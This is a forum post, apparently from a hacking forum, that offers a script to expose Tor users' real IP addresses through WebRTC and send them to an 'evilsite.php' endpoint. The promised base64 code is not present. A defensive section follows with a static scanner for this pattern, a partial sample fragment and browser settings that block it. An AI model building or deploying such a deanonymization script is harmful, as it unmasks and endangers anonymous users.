Obtain Tor User's IP By Bypassing Exit Node
02-03-2023, 11:34 AM
Warning: This code contains malicious scripting. Use with caution.
This malicious script is designed to obtain a user's home IP address by bypassing the exit node of a TOR network. It begins by setting various PHP parameters such as error reporting, max execution time, and display errors to 0 in order to prevent detection. It then creates a JavaScript function that uses the RTPDataChannels feature to obtain the user's IP address. The code also contains a 'httpGet' function which sends an HTTP request and returns the response. Finally, the code echoes the malicious script, which attempts to obtain the IP address and send it to a server at 'localhost/evilsite.php?IP='. This malicious script can be used to gather information about a user's online activity, which can be used to track them or gain unauthorized access to their system.
The code is in base64; decode it.
Code:
(This post was last modified: 02-03-2023, 11:35 AM by DoXeD.)
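For defenders reviewing page scripts, the pattern described in the post above (an RTCPeerConnection whose ICE candidates are read for addresses and then sent to a server) can be triaged statically. The following is an added example, not code from the original post; the indicator names, verdict rules and both sample fragments are assumptions constructed for illustration.

```javascript
// Added example, not code from the original post. Static triage for page
// scripts that read addresses out of WebRTC ICE candidates and report them.
const INDICATORS = {
  peerConnection: /\b(?:webkit|moz)?RTCPeerConnection\b/,
  iceCallback: /\bonicecandidate\b|['"]icecandidate['"]/,
  readsCandidate: /\.candidate\.candidate\b/,       // raw candidate line accessed
  ipv4Pattern: /\{1,3\}[^\n]{0,16}\{3\}/,           // dotted-quad regex in source
  emptyDataChannel: /createDataChannel\(\s*(['"])\1\s*\)/,
  networkSend: /\bXMLHttpRequest\b|\bfetch\s*\(|\bsendBeacon\s*\(/,
};

// Drop comments so commented-out code does not count as an indicator.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, ' ')
            .replace(/(^|[^:])\/\/[^\n]*/g, '$1');
}

// Verdict rules (assumed): 'flag' = reads addresses and can send them out,
// 'review' = partial pattern, 'clean' = neither.
function scanScript(src) {
  const code = stripComments(src);
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(code));
  const has = (k) => hits.includes(k);
  const harvests = has('peerConnection') && has('iceCallback') &&
    (has('readsCandidate') || has('ipv4Pattern'));
  let verdict = 'clean';
  if (harvests && has('networkSend')) verdict = 'flag';
  else if (harvests || (has('peerConnection') && has('emptyDataChannel'))) verdict = 'review';
  return { verdict, hits };
}

// Constructed, non-functional fragment carrying the indicators.
const SAMPLE_HARVEST = String.raw`
var pc = new RTCPeerConnection(servers);
pc.onicecandidate = function (ice) {
  var m = /([0-9]{1,3}(\.[0-9]{1,3}){3})/.exec(ice.candidate.candidate);
};
pc.createDataChannel('');
var x = new XMLHttpRequest();`;

// Constructed fragment of an ordinary video call: candidates go to signaling.
const SAMPLE_CALL = `
const pc = new RTCPeerConnection(config);
stream.getTracks().forEach((t) => pc.addTrack(t, stream));
pc.onicecandidate = (e) => e.candidate && signaling.send(e.candidate);`;

for (const [name, src] of [['harvest', SAMPLE_HARVEST], ['call', SAMPLE_CALL]]) {
  console.log(name, scanScript(src));
}
```

Tor Browser ships with WebRTC disabled; in other Firefox-based browsers, setting the `media.peerconnection.enabled` preference to `false` removes the API this pattern depends on.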